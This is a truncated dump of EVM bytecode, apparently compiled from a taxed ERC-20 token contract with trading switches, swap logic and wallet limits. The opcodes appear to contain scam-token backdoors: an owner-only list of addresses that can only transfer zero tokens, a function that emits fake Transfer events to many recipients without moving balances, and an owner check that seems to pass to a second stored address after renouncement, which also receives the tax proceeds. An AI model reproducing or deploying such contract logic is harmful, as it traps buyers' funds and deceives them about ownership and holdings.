0002d3919062000bcf565b60098190555061012c600d8190555061012c600c819055506001600e60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600e600060805173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600f60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600f600060805173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050505062000ce2565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000596576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200058d9062000c57565b60405180910390fd5b620005aa600083836200069c60201b60201c565b8060056000828254620005be919062000c79565b9250508190555080600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000672919062000cc5565b60405180910390a36200068e60008383620006a160201b60201c565b5050565b6000600554905090565b505050565b505050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620006d882620006ab565b9050919050565b620006ea81620006cb565b8114620006f657600080fd5b50565b6000815190506200070a81620006df565b92915050565b600060208284031215620007295762000728620006a6565b5b60006200073984828501620006f9565b91505092915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620007c457607f821691505b602082108103620007da57620007d96200077c565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620008447fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000805565b62000850868362000805565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b60006200089d62000897620008918462000868565b62000872565b62000868565b9050919050565b6000819050919050565b620008b9836200087c565b620008d1620008c882620008a4565b84845462000812565b825550505050565b600090565b620008e8620008d9565b620008f5818484620008ae565b505050565b5b818110156200091d5762000911600082620008de565b600181019050620008fb565b5050565b601f8211156200096c576200093681620007e0565b6200094184620007f5565b8101602085101562000951578190505b620009696200096085620007f5565b830182620008fa565b50505b505050565b600082821c905092915050565b6000620009916000198460080262000971565b1980831691505092915050565b6000620009ac83836200097e565b9150826002028217905092915050565b620009c78262000742565b67ffffffffffffffff811115620009e357620009e26200074d565b5b620009ef8254620007ab565b620009fc82828562000921565b600060209050601f83116001811462000a34576000841562000a1f578287015190505b62000a2b85826200099e565b86555062000a9b565b601f19841662000a4486620007e0565b60005b8281101562000a6e5784890151825560018201915060208501945060208101905062000a47565b8683101562000a8e578489015162000a8a601f8916826200097e565b8355505b6001600288020188555050505b505050505050565b600082825260208201905092915050565b7f436861696e206e6f7420636f6e66696775726564000000000000000000000000600082015250565b600062000aec60148362000aa3565b915062000af98262000ab4565b602082019050919050565b6000602082019050818103600083015262000b1f8162000add565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000b628262000868565b915062000b6f8362000868565b925082820262000b7f8162000868565b9150828204841483151762000b995762000b9862000b26565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600062000bdc8262000868565b915062000be98362000868565b92508262000bfc5762000bfb62000ba0565b5b828204905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000c3f601f8362000aa3565b915062000c4c8262000c07565b602082019050919050565b6000602082019050818103600083015262000c728162000c30565b9050919050565b600062000c868262000868565b915062000c938362000868565b925082820190508082111562000cae5762000cad62000b26565b5b92915050565b62000cbf8162000868565b82525050565b600060208201905062000cdc600083018462000cb4565b92915050565b608051613aa162000d136000396000818161081e01528181611ebf0152818161255401526126310152613aa16000f3fe608060405234801561001057600080fd5b50600436106102535760003560e01c80638d3e6e4011610146578063bbc0c742116100c3578063dd62ed3e11610087578063dd62ed3e146106f0578063e884f26014610720578063f1f50a021461072a578063f2fde38b14610734578063f852b42d14610750578063f8b45b051461076c57610253565b8063bbc0c7421461065e578063c2b7bbb61461067c578063c647b20e14610698578063c78d0fa0146106b4578063cc1776d3146106d257610253565b80639e93ad8e1161010a5780639e93ad8e146105a6578063a457c2d7146105c4578063a9059cbb146105f4578063ab5a188714610624578063b2c25bce1461064057610253565b80638d3e6e40146104ee5780638da5cb5b1461051e5780638ed6795e1461053c57806391b296951461055857806395d89b411461058857610253565b80634a62bb65116101d45780636162c92e116101985780636162c92e1461045c5780636cd20f5e1461046657806370945d5f1461049657806370a08231146104b4578063715018a6146104e457610253565b80634a62bb65146103b65780634f7041a5146103d4578063540dd452146103f25780635d0044ca146104225780635d58ce361461043e57610253565b806323b872dd1161021b57806323b872dd146102fe57806326ededb81461032e578063313ce5671461034a5780633950935114610368578063452ed4f11461039857610253565b806306fdde03146102585780630758d92414610276578063095ea7b3146102945780631111f43f146102c457806318160ddd146102e0575b600080fd5b61026061078a565b60405161026d9190612757565b60405180910390f35b61027e61081c565b60405161028b91906127f8565b60405180910390f35b6102ae60048036038101906102a99190612891565b610840565b6040516102bb91906128ec565b60405180910390f35b6102de60048036038101906102d99190612998565b610863565b005b6102e861090a565b6040516102f59190612a07565b60405180910390f35b61031860048036038101906103139190612a22565b610914565b60405161032591906128ec565b60405180910390f35b61034860048036038101906103439190612a75565b610943565b005b610352610a1a565b60405161035f9190612af1565b60405180910390f35b610382600480360381019061037d9190612891565b610a23565b60405161038f91906128ec565b60405180910390f35b6103a0610a5a565b6040516103ad9190612b1b565b60405180910390f35b6103be610a80565b6040516103cb91906128ec565b60405180910390f35b6103dc610a93565b6040516103e99190612a07565b60405180910390f35b61040c60048036038101906104079190612b36565b610a99565b60405161041991906128ec565b60405180910390f35b61043c60048036038101906104379190612b63565b610ab9565b005b610446610ba2565b6040516104539190612a07565b60405180910390f35b610464610baa565b005b610480600480360381019061047b9190612b36565b610c32565b60405161048d91906128ec565b60405180910390f35b61049e610c88565b6040516104ab9190612a07565b60405180910390f35b6104ce60048036038101906104c99190612b36565b610c8e565b6040516104db9190612a07565b60405180910390f35b6104ec610cd7565b005b61050860048036038101906105039190612b36565b610ceb565b60405161051591906128ec565b60405180910390f35b610526610d0b565b6040516105339190612b1b565b60405180910390f35b61055660048036038101906105519190612b90565b610d34565b005b610572600480360381019061056d9190612b36565b610e3f565b60405161057f91906128ec565b60405180910390f35b610590610e5f565b60405161059d9190612757565b60405180910390f35b6105ae610ef1565b6040516105bb9190612a07565b60405180910390f35b6105de60048036038101906105d99190612891565b610ef7565b6040516105eb91906128ec565b60405180910390f35b61060e60048036038101906106099190612891565b610f6e565b60405161061b91906128ec565b60405180910390f35b61063e60048036038101906106399190612b63565b610f91565b005b61064861107b565b60405161065591906128ec565b60405180910390f35b61066661108e565b60405161067391906128ec565b60405180910390f35b61069660048036038101906106919190612b36565b6110a1565b005b6106b260048036038101906106ad9190612bd0565b6110ed565b005b6106bc611179565b6040516106c99190612a07565b60405180910390f35b6106da61117f565b6040516106e79190612a07565b60405180910390f35b61070a60048036038101906107059190612c10565b611185565b6040516107179190612a07565b60405180910390f35b61072861120c565b005b610732611231565b005b61074e60048036038101906107499190612b36565b6112a6565b005b61076a60048036038101906107659190612b90565b611329565b005b6107746114ca565b6040516107819190612a07565b60405180910390f35b60606006805461079990612c7f565b80601f01602080910402602001604051908101604052809291908181526020018280546107c590612c7f565b80156108125780601f106107e757610100808354040283529160200191610812565b820191906000526020600020905b8154815290600101906020018083116107f557829003601f168201915b5050505050905090565b7f000000000000000000000000000000000000000000000000000000000000000081565b60008061084b6114d0565b90506108588185856114d8565b600191505092915050565b61086b6116a1565b60005b8383905081101561090457816003600086868581811061089157610890612cb0565b5b90506020020160208101906108a69190612b36565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808060010191505061086e565b50505050565b6000600554905090565b60008061091f6114d0565b905061092c85828561171f565b6109378585856117ab565b60019150509392505050565b61094b6116a1565b60005b83839050811015610a145783838281811061096c5761096b612cb0565b5b90506020020160208101906109819190612b36565b73ffffffffffffffffffffffffffffffffffffffff16601260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516109ff9190612a07565b60405180910390a3808060010191505061094e565b50505050565b60006009905090565b600080610a2e6114d0565b9050610a4f818585610a408589611185565b610a4a9190612d0e565b6114d8565b600191505092915050565b601260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600860019054906101000a900460ff1681565b600c5481565b600e6020528060005260406000206000915054906101000a900460ff1681565b610ac16116a1565b610ac9610a1a565b600a610ad59190612e75565b60646001610ae161090a565b610aeb9190612ec0565b610af59190612f31565b610aff9190612f31565b811015610b41576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b3890612fae565b60405180910390fd5b610b49610a1a565b600a610b559190612e75565b81610b609190612ec0565b600b819055507fde064515fae8f8bb6d8ff19d2c6ba704322def7494147d8a971266430ade0788600b54604051610b979190612a07565b60405180910390a150565b600047905090565b610bb26116a1565b6000600860016101000a81548160ff0219169083151502179055506000600860006101000a81548160ff021916908315150217905550610bf061090a565b600a81905550610bfe61090a565b600b819055507fa4ffae85e880608d5d4365c2b682786545d136145537788e7e0940dff9f0b98c60405160405180910390a1565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600a5481565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610cdf6116a1565b610ce96000611911565b565b600f6020528060005260406000206000915054906101000a900460ff1681565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b610d3c6116a1565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610dab576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610da29061301a565b60405180910390fd5b80600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055507f998cce27cbf44405c67eb636a634d5e2f2e6ff248b3d71fbbbb022f3c4c6dd2d8282604051610e3392919061303a565b60405180910390a15050565b60106020528060005260406000206000915054906101000a900460ff1681565b606060078054610e6e90612c7f565b80601f0160208091040260200160405190810160405280929190818152602001828054610e9a90612c7f565b8015610ee75780601f10610ebc57610100808354040283529160200191610ee7565b820191906000526020600020905b815481529060010190602001808311610eca57829003601f168201915b5050505050905090565b61271081565b600080610f026114d0565b90506000610f108286611185565b905083811015610f55576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f4c906130d5565b60405180910390fd5b610f6282868684036114d8565b60019250505092915050565b600080610f796114d0565b9050610f868185856117ab565b600191505092915050565b610f996116a1565b610fa1610a1a565b600a610fad9190612e75565b6103e86005610fba61090a565b610fc49190612ec0565b610fce9190612f31565b610fd89190612f31565b81101561101a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161101190613141565b60405180910390fd5b611022610a1a565b600a61102e9190612e75565b816110399190612ec0565b600a819055507fbd5d3777a4ca05c2475cf0dd89d6a70173f775d8b42722c19d597cd7c870c4c7600a546040516110709190612a07565b60405180910390a150565b600860009054906101000a900460ff1681565b600860029054906101000a900460ff1681565b6110a96116a1565b80601260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6110f56116a1565b81600c819055507f5380a61520019ce8270d583f62f1b2b9f4f4372e1acaaf708f4865cecece0508600c5460405161112d9190612a07565b60405180910390a180600d819055507fa02824f65350567bc405e202b741e7ca6274004a9feeb44149df72b8bd599c97600d5460405161116d9190612a07565b60405180910390a15050565b60095481565b600d5481565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6112146116a1565b6000600860006101000a81548160ff021916908315150217905550565b6112396116a1565b600860029054906101000a900460ff1615611289576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611280906131ad565b60405180910390fd5b6001600860026101000a81548160ff021916908315150217905550565b6112ae6116a1565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361131d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113149061323f565b60405180910390fd5b61132681611911565b50565b6113316116a1565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036113a0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113979061301a565b60405180910390fd5b8061143657601260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611435576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161142c906132ab565b60405180910390fd5b5b80600f60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055507f8f9f40630a1d139e6cf69b4f447ca47a36f10a017524efaa38252e516fa227ce82826040516114be92919061303a565b60405180910390a15050565b600b5481565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611547576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161153e9061333d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036115b6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115ad906133cf565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516116949190612a07565b60405180910390a3505050565b6116a96114d0565b73ffffffffffffffffffffffffffffffffffffffff166116c76119d5565b73ffffffffffffffffffffffffffffffffffffffff161461171d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117149061343b565b60405180910390fd5b565b600061172b8484611185565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146117a55781811015611797576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161178e906134a7565b60405180910390fd5b6117a484848484036114d8565b5b50505050565b600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061184c5750600e60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b806118635750600860039054906101000a900460ff165b15611878576118738383836119e9565b61190c565b600860029054906101000a900460ff166118c7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118be90613513565b60405180910390fd5b6118d2838383611cc2565b816118dd9190613533565b9050600860019054906101000a900460ff1615611900576118ff838383611ea8565b5b61190b8383836119e9565b5b505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000806119e061231c565b90508091505090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611a58576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a4f906135d9565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611ac7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611abe9061366b565b60405180910390fd5b611ad28383836123c0565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611b325760008114611b3157600080fd5b5b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611bb9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bb0906136fd565b60405180910390fd5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611ca99190612a07565b60405180910390a3611cbc8484846123c5565b50505050565b6000600954611cd030610c8e565b10158015611ceb5750600860039054906101000a900460ff16155b8015611d415750601060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611d85576001600860036101000a81548160ff021916908315150217905550611d696123ca565b6000600860036101000a81548160ff0219169083151502179055505b6000601060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015611de257506000600d54115b15611e0957612710600d5484611df89190612ec0565b611e029190612f31565b9050611e88565b601060008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015611e6457506000600c54115b15611e8757612710600c5484611e7a9190612ec0565b611e849190612f31565b90505b5b6000811115611e9d57611e9c8530836119e9565b5b809150509392505050565b600860009054906101000a900460ff161561202f577f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614158015611f635750601060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561202e5743601160003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205410611fe9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611fe090613769565b60405180910390fd5b43601160003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b601060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156120d25750600f60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561217957600a5481111561211c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612113906137d5565b60405180910390fd5b600b5461212883610c8e565b826121339190612d0e565b1115612174576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161216b90613841565b60405180910390fd5b612317565b601060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561221c5750600f60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561226b57600a54811115612266576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161225d906137d5565b60405180910390fd5b612316565b600f60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661231557600b546122c883610c8e565b826122d39190612d0e565b1115612314576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161230b90613841565b60405180910390fd5b5b5b5b505050565b60008073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146123975760008054906101000a900473ffffffffffffffffffffffffffffffffffffffff166123bb565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff165b905090565b505050565b505050565b60006123d530610c8e565b9050600081036123e557506124b3565b60286009546123f49190612ec0565b81111561240d57602860095461240a9190612ec0565b90505b612416816124b5565b60004711156124b1576000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff164760405161246790613892565b60006040518083038185875af1925050503d80600081146124a4576040519150601f19603f3d011682016040523d82523d6000602084013e6124a9565b606091505b505080915050505b505b565b6000600267ffffffffffffffff8111156124d2576124d16138a7565b5b6040519080825280602002602001820160405280156125005781602001602082028036833780820191505090505b509050308160008151811061251857612517612cb0565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156125bd573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906125e191906138eb565b816001815181106125f5576125f4612cb0565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b8152600401612691959493929190613a11565b600060405180830381600087803b1580156126ab57600080fd5b505af11580156126bf573d6000803e3d6000fd5b505050505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156127015780820151818401526020810190506126e6565b60008484015250505050565b6000601f19601f8301169050919050565b6000612729826126c7565b61273381856126d2565b93506127438185602086016126e3565b61274c8161270d565b840191505092915050565b60006020820190508181036000830152612771818461271e565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b60006127be6127b96127b484612779565b612799565b612779565b9050919050565b60006127d0826127a3565b9050919050565b60006127e2826127c5565b9050919050565b6127f2816127d7565b82525050565b600060208201905061280d60008301846127e9565b92915050565b600080fd5b600080fd5b600061282882612779565b9050919050565b6128388161281d565b811461284357600080fd5b50565b6000813590506128558161282f565b92915050565b6000819050919050565b61286e8161285b565b811461287957600080fd5b50565b60008135905061288b81612865565b92915050565b600080604083850312156128a8576128a7612813565b5b60006128b685828601612846565b92505060206128c78582860161287c565b9150509250929050565b60008115159050919050565b6128e6816128d1565b82525050565b600060208201905061290160008301846128dd565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261292c5761292b612907565b5b8235905067ffffffffffffffff8111156129495761294861290c565b5b60208301915083602082028301111561296557612964612911565b5b9250929050565b612975816128d1565b811461298057600080fd5b50565b6000813590506129928161296c565b92915050565b6000806000604084860312156129b1576129b0612813565b5b600084013567ffffffffffffffff8111156129cf576129ce612818565b5b6129db86828701612916565b935093505060206129ee86828701612983565b9150509250925092565b612a018161285b565b82525050565b6000602082019050612a1c60008301846129f8565b92915050565b600080600060608486031215612a3b57612a3a612813565b5b6000612a4986828701612846565b9350506020612a5a86828701612846565b9250506040612a6b8682870161287c565b9150509250925092565b600080600060408486031215612a8e57612a8d612813565b5b600084013567ffffffffffffffff811115612aac57612aab612818565b5b612ab886828701612916565b93509350506020612acb8682870161287c565b9150509250925092565b600060ff82169050919050565b612aeb81612ad5565b82525050565b6000602082019050612b066000830184612ae2565b92915050565b612b158161281d565b82525050565b6000602082019050612b306000830184612b0c565b92915050565b600060208284031215612b4c57612b4b612813565b5b6000612b5a84828501612846565b91505092915050565b600060208284031215612b7957612b78612813565b5b6000612b878482850161287c565b91505092915050565b60008060408385031215612ba757612ba6612813565b5b6000612bb585828601612846565b9250506020612bc685828601612983565b9150509250929050565b60008060408385031215612be757612be6612813565b5b6000612bf58582860161287c565b9250506020612c068582860161287c565b9150509250929050565b60008060408385031215612c2757612c26612813565b5b6000612c3585828601612846565b9250506020612c4685828601612846565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680612c9757607f821691505b602082108103612caa57612ca9612c50565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000612d198261285b565b9150612d248361285b565b9250828201905080821115612d3c57612d3b612cdf565b5b92915050565b60008160011c9050919050565b6000808291508390505b6001851115612d9957808604811115612d7557612d74612cdf565b5b6001851615612d845780820291505b8081029050612d9285612d42565b9450612d59565b94509492505050565b600082612db25760019050612e6e565b81612dc05760009050612e6e565b8160018114612dd65760028114612de057612e0f565b6001915050612e6e565b60ff841115612df257612df1612cdf565b5b8360020a915084821115612e0957612e08612cdf565b5b50612e6e565b5060208310610133831016604e8410600b8410161715612e445782820a905083811115612e3f57612e3e612cdf565b5b612e6e565b612e518484846001612d4f565b92509050818404811115612e6857612e67612cdf565b5b81810290505b9392505050565b6000612e808261285b565b9150612e8b83612ad5565b9250612eb87fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484612da2565b905092915050565b6000612ecb8261285b565b9150612ed68361285b565b9250828202612ee48161285b565b91508282048414831517612efb57612efa612cdf565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000612f3c8261285b565b9150612f478361285b565b925082612f5757612f56612f02565b5b828204905092915050565b7f4d757374206265203e3d20312500000000000000000000000000000000000000600082015250565b6000612f98600d836126d2565b9150612fa382612f62565b602082019050919050565b60006020820190508181036000830152612fc781612f8b565b9050919050565b7f5a65726f20416464726573730000000000000000000000000000000000000000600082015250565b6000613004600c836126d2565b915061300f82612fce565b602082019050919050565b6000602082019050818103600083015261303381612ff7565b9050919050565b600060408201905061304f6000830185612b0c565b61305c60208301846128dd565b9392505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006130bf6025836126d2565b91506130ca82613063565b604082019050919050565b600060208201905081810360008301526130ee816130b2565b9050919050565b7f4d757374206265203e3d20302e35250000000000000000000000000000000000600082015250565b600061312b600f836126d2565b9150613136826130f5565b602082019050919050565b6000602082019050818103600083015261315a8161311e565b9050919050565b7f54726164696e6720697320616c72656164792061637469766500000000000000600082015250565b60006131976019836126d2565b91506131a282613161565b602082019050919050565b600060208201905081810360008301526131c68161318a565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006132296026836126d2565b9150613234826131cd565b604082019050919050565b600060208201905081810360008301526132588161321c565b9050919050565b7f5061697200000000000000000000000000000000000000000000000000000000600082015250565b60006132956004836126d2565b91506132a08261325f565b602082019050919050565b600060208201905081810360008301526132c481613288565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006133276024836126d2565b9150613332826132cb565b604082019050919050565b600060208201905081810360008301526133568161331a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006133b96022836126d2565b91506133c48261335d565b604082019050919050565b600060208201905081810360008301526133e8816133ac565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006134256020836126d2565b9150613430826133ef565b602082019050919050565b6000602082019050818103600083015261345481613418565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000613491601d836126d2565b915061349c8261345b565b602082019050919050565b600060208201905081810360008301526134c081613484565b9050919050565b7f54726164696e67206e6f74206163746976650000000000000000000000000000600082015250565b60006134fd6012836126d2565b9150613508826134c7565b602082019050919050565b6000602082019050818103600083015261352c816134f0565b9050919050565b600061353e8261285b565b91506135498361285b565b925082820390508181111561356157613560612cdf565b5b92915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006135c36025836126d2565b91506135ce82613567565b604082019050919050565b600060208201905081810360008301526135f2816135b6565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006136556023836126d2565b9150613660826135f9565b604082019050919050565b6000602082019050818103600083015261368481613648565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006136e76026836126d2565b91506136f28261368b565b604082019050919050565b60006020820190508181036000830152613716816136da565b9050919050565b7f5472616e736665722044656c617920656e61626c65642e000000000000000000600082015250565b60006137536017836126d2565b915061375e8261371d565b602082019050919050565b6000602082019050818103600083015261378281613746565b9050919050565b7f